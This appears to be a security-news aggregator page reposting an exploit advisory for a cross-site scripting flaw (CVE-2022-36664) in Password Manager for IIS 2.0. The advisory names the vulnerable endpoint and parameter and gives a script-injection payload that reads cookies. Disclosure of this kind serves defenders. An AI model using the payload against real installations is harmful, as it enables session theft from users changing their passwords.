Security
Headlines

Headlines Latest CVEs

Headline

Password Manager For IIS 2.0 Cross Site Scripting

Password Manager for IIS version 2.0 suffers from a cross site scripting vulnerability.

2 years ago

#xss #vulnerability #windows #auth #sap

# Exploit Title: *XSS*# Exploit Author: *VP4TR10T*# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/<http://passwordmanager.adiscon.com/en/manual/>*# Software Link:*http://passwordmanager.adiscon.com/<http://passwordmanager.adiscon.com/>*# Version: *Version 2.0*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664*Affected URI (when trying to change user password):POST /isapi/PasswordManager.dll HTTP/1.1HTTP Payload (Affected Parameter ):ReturnURL=<script>alert(document.cookie)</script>*Cordially,*

Related news

CVE-2022-36664: Password Manger for IIS * User Manual * Version 1.0

Password Manager for IIS 2.0 has a cross-site scripting (XSS) vulnerability via the /isapi/PasswordManager.dll ResultURL parameter.

1 year ago

#xss #vulnerability #web #mac #windows #microsoft #sap

Packet Storm: Latest News

Backdoor.Win32.Benju.a MVID-2024-0700 Remote Command Execution

1 day ago

Backdoor.Win32.Prorat.jz MVID-2024-0699 Buffer Overflow

1 day ago

Backdoor.Win32.Amatu.a MVID-2024-0698 Arbitrary File Write

1 day ago

Backdoor.Win32.Agent.pw MVID-2024-0697 Buffer Overflow

1 day ago

Backdoor.Win32.Boiling MVID-2024-0696 Code Execution

1 day ago